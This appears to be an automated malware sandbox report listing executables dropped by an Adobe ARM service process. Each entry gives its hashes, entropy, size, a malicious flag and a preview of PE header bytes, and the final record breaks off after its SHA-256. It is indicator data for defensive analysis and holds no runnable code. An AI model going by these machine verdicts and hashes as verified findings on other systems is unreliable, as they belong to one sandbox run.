                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................t...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...............R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2168832
                                                                                                                                                                                                                            Entropy (8bit):7.93790619769932
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:oy53w24gQu3TPZ2psFkiSqwoz8JLeQVPyzc+E7xQ2l:oyFQgZqsFki+oz81vcbE7xQ2l
                                                                                                                                                                                                                            MD5:BCD40F55DB6F9DE2C72519B69421A329
                                                                                                                                                                                                                            SHA1:3ED0A425E3397B2527B6FD123E4D3115A7AC9A6C
                                                                                                                                                                                                                            SHA-256:502ABB7121B1264F82B93D27952B8D152ED02433D86B2E85F18BA032C47CFF02
                                                                                                                                                                                                                            SHA-512:F6CCC2D0897D6B9B8DD5430E7A72F8D90F9170D778F793D5F1A90AB0063B3D5E2F16A45412207FB68AE93083CB1FD633CFCF22EFAB5E48464924E77F40221740
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....K9!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3141
                                                                                                                                                                                                                            Entropy (8bit):4.861106056265354
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:lvMzdwvMvrvMuvM3vM64vMSvMsRzvMqWtFvM7vMqWmIFvMr1vM1vMQvM0uvMqvMO:WaiRSBmhid74ixq4ZVnyD
                                                                                                                                                                                                                            MD5:9E3146B893F46C27F5D9F46E9BC6F4D9
                                                                                                                                                                                                                            SHA1:25B7608BDAF854CDDB0FE5BE0231CFE54A496D86
                                                                                                                                                                                                                            SHA-256:892B8112ACD01FA43D1447D2A9AAC2E57A18AC6DFFBAD96C25212C36E7705254
                                                                                                                                                                                                                            SHA-512:97C45E253B5DE26F6AAC6A783362B4D68DC632DD93E0A24B0B4DC7F325DEB0496E741871194BE2E4CC15914146FCD587BDA03414AFD80B40DF5C9FFE928F5DF9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-16 08:10:21-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-16 08:10:21-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-16 08:10:2
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1463296
                                                                                                                                                                                                                            Entropy (8bit):5.0305104587479255
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:xQVTZu0J+GJ0eeQ2yPyzc+E7xonyVGc/dT5N:yVTZuAJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:E78B9CA154BB75A39A7016C4054776F9
                                                                                                                                                                                                                            SHA1:4212D2B4F6FD7DB17941CE586FE8751B23B279DF
                                                                                                                                                                                                                            SHA-256:2DADFF9C3949ED2EF24814DC3CD7ADC681B5B069A93F08EC32E3CC09C5392D6B
                                                                                                                                                                                                                            SHA-512:65C625B6DF28B24BCBE0E03D67E64CE69D4C454444E94A1DC6923E9E369C8E43171082CE442423A92092AFFA950168D66C3704A35AF5A2DF945860DE241ACC9B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................. ........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1790464
                                                                                                                                                                                                                            Entropy (8bit):5.358114570592415
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:M+gkEdfh4CovGJ0eeQ2yPyzc+E7xonyVGc/dT5N:JgkE5SMJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:133663AC0175A2FB19C341E46F797549
                                                                                                                                                                                                                            SHA1:369C8F22F88D0604012239642B95C57F10EC31C5
                                                                                                                                                                                                                            SHA-256:FED8C55F742897E8132233D5D92D5F5310645AB52D4F8F37389948C7CF6DA25F
                                                                                                                                                                                                                            SHA-512:426D58D99E98AB557EB549C25574E3D59F9FF82EA5BFACC2DFC3644BAECB59B77C8226C811B6275A939FCA526DA58253881527530EB8D908F498C9D818EA1DDC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...............................%.....x..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1532416
                                                                                                                                                                                                                            Entropy (8bit):7.089310041105561
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:8BpDRmi78gkPXlyo0GhjrWGJ0eeQ2yPyzc+E7xonyVGc/dT5N:oNRmi78gkPX4o0GhjtJLeQVPyzc+E7xX
                                                                                                                                                                                                                            MD5:048C06B5B8AA89BCB426C31B81BA4484
                                                                                                                                                                                                                            SHA1:C85C4C8BF1B671B477987F26E197DFAD3C9EBC91
                                                                                                                                                                                                                            SHA-256:BA3CF46626970036E3D1C180A80EC6CA9565A3FB80D61CB3F3433537D9C8CB80
                                                                                                                                                                                                                            SHA-512:03DAFE83DCDF500BE3808AEF41FC8165BD67F45C8C2FC70A45FC7830F6164B8AE2BBF4840BF0A33589FBB724B093339B6140949C610C3A0353ACFE2205EA2076
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................s..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1282048
                                                                                                                                                                                                                            Entropy (8bit):7.220177456459704
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:YLOS2oPPIXVvGJ0eeQ2yPyzc+E7xonyVGc/dT5N:g/PVJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:826FB51055AFE54F3900011243C3C4E6
                                                                                                                                                                                                                            SHA1:12012CD714CB96D42FF97696225A67C30E3FFFBB
                                                                                                                                                                                                                            SHA-256:1BBFD694DA77066B1AF201872C7A4F496F00F53F2AAEF53A31C94A8C24A8739C
                                                                                                                                                                                                                            SHA-512:5B90A3033A605517F46C902FB9E7081BF79710F5FABFF5D0E6E5DF07C9B93B580A4DDE8859956CDE652A2DBE451D120A4D208319ABC480B879C8E48CA780D41F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................Q..... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1251840
                                                                                                                                                                                                                            Entropy (8bit):4.674458145400088
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:YYBGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:YYBGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:F825B9EDE1AF47BED59D43B487218D1D
                                                                                                                                                                                                                            SHA1:BA489BA32ADE0F4B4183CD50D9C07383495BBF12
                                                                                                                                                                                                                            SHA-256:04A83902A46CD4B35F418E8AA7F4B67E57777105DDB92DBADD49B7DA4F6469FD
                                                                                                                                                                                                                            SHA-512:9A29468EF2FC1BD677B306A9BB54BED643E0A34B7A9C87A6EE753ED9531E09B39BEC163E6F98539E8EBC594997A1BAB17CD2A53AFD4937552C72FF72876901BF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..........................P......).......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1222656
                                                                                                                                                                                                                            Entropy (8bit):6.7017851457820585
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:rtdzQGJ0eeQ2yPyzc+E7xonyVGc/dT5N:rtdLJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:2C18954BE6BB52BC8ACD34894716D1D5
                                                                                                                                                                                                                            SHA1:E3F062614AE6FED0B9DF4E70B85E02C767175E5B
                                                                                                                                                                                                                            SHA-256:CD3F3884827D9777897E18021F922F78A683321D32144DCE018C6A90B986448A
                                                                                                                                                                                                                            SHA-512:39923E83CA96FDEB4F7907EBC1AC98CAE3734A4FAB00743EA771EEAD69E9525B0AFCA6F1F7291E31941B016CEBCEA5EA4480F9DD699B3A961D866E093C8699BB
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................\\.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1564160
                                                                                                                                                                                                                            Entropy (8bit):4.797262735345001
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:7vMGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:IGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:7CB0AC63221B3AD0500796DA2B3EC5B3
                                                                                                                                                                                                                            SHA1:EA4035AA52BF1AEF6E94BA04FAB0199B8808BCB4
                                                                                                                                                                                                                            SHA-256:F4CB29AF5CEAD9134CDA64AE495FE1056145BF706CB6516AB76F9744EA4F4BD0
                                                                                                                                                                                                                            SHA-512:99C80689F77BC78458A094A935CEDBEE19E0C144E081E7AC1A2BA796C4EB26D0965693DBF63F8DE25CCA24D104D2460D691E46E8FAAE465E697BECBB507BDED1
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.............................0"......%.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1567744
                                                                                                                                                                                                                            Entropy (8bit):5.1690578543521015
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:z5zhM1XSFzGJ0eeQ2yPyzc+E7xonyVGc/dT5N:3MsIJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:168A2955BC97DB4FDE3E896185A1668D
                                                                                                                                                                                                                            SHA1:F57B51CAA52D5751CF44E21EBCDD362B7FB989FF
                                                                                                                                                                                                                            SHA-256:3EF71002CC9DE9AD317638A8E7AC0B7B5A432B37A37B97CA51C3AFC0CC45D006
                                                                                                                                                                                                                            SHA-512:6F3C23586170598B393ED7F37284F178110A7B760415310F5D21DDAA0076EB1D3D3DB63174A0DD487E621F120374ED785D299C4BAC2ECE9AC23A814BFD7772D4
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.............................."........... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc.......0......................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4151808
                                                                                                                                                                                                                            Entropy (8bit):6.4968962129233585
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:1tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755RJLeQVP5:1jEIa3HIEWOc5L1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:39632673955559BEECD2A778F477B95C
                                                                                                                                                                                                                            SHA1:4CFFA327349A611F4BF009AD598760EB2B502FEE
                                                                                                                                                                                                                            SHA-256:066385F68E7789FF7872BF41CB68BB43D01DEFAC3FB130406FB49FD39BBA8390
                                                                                                                                                                                                                            SHA-512:7E6FCC22DB1E45D1267AD643A84C1FADF17032C9AE180096F92A91AE53E07463FA7070614CEDE1C698E96FAF18A3BAEBFD5C84374DEC9D01C3F4A24AF4C265F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....K.@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59941376
                                                                                                                                                                                                                            Entropy (8bit):7.999357810181696
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:1572864:AQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAsH:fXhwMhe6AABPiQwF6xQ22Rg
                                                                                                                                                                                                                            MD5:D7D645287FB30D5F3256D2757112602C
                                                                                                                                                                                                                            SHA1:CDD955B228531CEA3BF52EFC5A4C9E0ECD46CC71
                                                                                                                                                                                                                            SHA-256:152BF8F94A18B360D2308CFA6531532FD71D6432A614A798C313DA87EFAB0AFD
                                                                                                                                                                                                                            SHA-512:370BE69038C75473BBED50DF51BC5C6C55EBD5833EA6980398A6310537257CB13C5F3F596D5C9CF829ABB0C7CFA8E9B77C5C9AB6AFB236077FABD33124B156FF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1286656
                                                                                                                                                                                                                            Entropy (8bit):4.736556735699809
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:CWdGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:CWGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:A281D31D654A10B2B1C981BE449CFF18
                                                                                                                                                                                                                            SHA1:7775E28D00A49C1D8B8C92E6CD8B8D1FA4FAE416
                                                                                                                                                                                                                            SHA-256:8DDD2D976568A005CB72BA0B1A83DF1ABD404A6E5894DA0E743F07280456257B
                                                                                                                                                                                                                            SHA-512:1D02A5D50D5A8A00EBACFEDCAB51710CDB22FDC1E2E9C89E9436347B4ECC2EAAF36857521FB474262C16ACE0501C09E642FD66F8C83B71DA307390FAAB2266F7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.....................................J.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6210048
                                                                                                                                                                                                                            Entropy (8bit):6.384713574550255
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:LnN9KfxLk6GEQTXsUKzNDU1vcbE7xQ2l:J9Kfe6GEQTX3KhU8m9
                                                                                                                                                                                                                            MD5:EE5880A36DB14E247D78FAF9591FA1F2
                                                                                                                                                                                                                            SHA1:6641B09F514E9A3FEAE7EF72CAB4B9D200B2CD87
                                                                                                                                                                                                                            SHA-256:42DB6BDDB59D548032A4AFC41078374D865D2CC7CAB5579E3A8F7AEE2762CFCB
                                                                                                                                                                                                                            SHA-512:A8FA618C72EC371F1FD85BAD9166128E2C5D5F5EBF6EADCA24A4C4CF77F6E76BEBE0C6C9C9ABD40539EDED1981D22B386E1C2AC7249B2F0F963FC1AA76F4CE64
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....!._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1263616
                                                                                                                                                                                                                            Entropy (8bit):4.689248759127094
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:I7GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:I7GJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:0A40CB85F29676B64C80F454A9DD17FD
                                                                                                                                                                                                                            SHA1:3F956686E6A0031A5A08065FF5C26BAC47D5DD6D
                                                                                                                                                                                                                            SHA-256:118E8C509B4419320CDD1E7F266A6E3DA52C26BF359530C88EE87906E9087B0E
                                                                                                                                                                                                                            SHA-512:02F91A8C0B62907DDE3F7BCEBDD1CB8FCA80ABF4D10DE99AF0C9E963964B35A7B240FBBC66E55BBCB75CA7A97EA057FAE6F08D31A27F85F08536C106EF96E24D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...............h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12039168
                                                                                                                                                                                                                            Entropy (8bit):6.595605993686211
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:ib+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKh1vcbE7xQ2l:EnPgTHIwZnRBk9DdhSUEVIXgKh8m9
                                                                                                                                                                                                                            MD5:645C9543EB693EC049BECE28D3EED6C6
                                                                                                                                                                                                                            SHA1:A7CFF0A5A36E7FE39072B58FA5E970675363DC3A
                                                                                                                                                                                                                            SHA-256:2D7C02FEC57E83EC4AE1EC1DD9977E6CE9C0AAC378E87B7DEC4D701409D88484
                                                                                                                                                                                                                            SHA-512:725E063BE27855B5E92C4030A5D0CD7EA08E09E7ADDA131CA48DAE2BE19E7D996F91B8380BA80AD6CE0EF5483475FCFC8C1314AB759396D4DA495AE524BC971D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................".... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1428992
                                                                                                                                                                                                                            Entropy (8bit):4.95966900780064
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:Hg5FvCPcseGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AfHOJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:5A6931ED83133B5CC770D317E4980F77
                                                                                                                                                                                                                            SHA1:637672A83D7C84E57D8AD194056FDF02298F780B
                                                                                                                                                                                                                            SHA-256:8648D000643901951F7F21ABD477AE217747D28BB012D56B3629DEF0C3CE3A56
